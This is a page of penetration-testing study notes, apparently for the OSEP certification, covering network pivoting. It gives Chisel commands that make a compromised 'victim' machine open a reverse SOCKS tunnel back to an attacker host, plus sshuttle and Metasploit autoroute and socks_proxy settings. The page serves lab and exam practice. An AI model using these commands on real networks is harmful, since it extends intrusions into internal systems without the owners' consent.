OSEP Notes
  • Introduction
  • Useful Links, Tools & Tricks
  • OSEP
    • Metasploit Payload & Listener
      • Metasploit Useful Modules
      • Encoder
    • File Transfer & Execution
    • Phishing
    • Local Reconnaissance Windows
      • SQL Server Instance
      • Application Whitelisting & Credentials
    • Local Reconnaissance Linux
      • Ansible
    • Privilege Escalation
    • Pivoting
    • Pass the Hash
      • Remote Access
    • Post Exploitation
      • Add User
      • AMSI, CLM, & App Locker
    • Credentials
    • Lateral Movement
  • Active Directory
    • Domain Reconnaissance on Kali
    • Domain Reconnaissance on Windows
    • Active Directory Forest
Powered by GitBook
On this page
  • Chisel - Socks_Proxy
  • SShuttle
  • Metasploit
  1. OSEP

Pivoting

Chisel - Socks_Proxy

  • Attacker

./chisel server --reverse --port 53
  • Victim

.\chisel.exe client 192.168.1.2:53 R:1080:socks

SShuttle

sshuttle -r root@10.10.110.1 172.16.1.0/24 --ssh-cmd 'ssh -i /root/Downloads/test.key' -x 10.10.110.1

Metasploit

use post/multi/manage/autoroute
set session x
run

use auxiliary/server/socks_proxy
run

or

use socks_proxy
set srvhost 127.0.0.1
run

use autoroute
set session 1
run
PreviousPrivilege EscalationNextPass the Hash

Last updated 1 year ago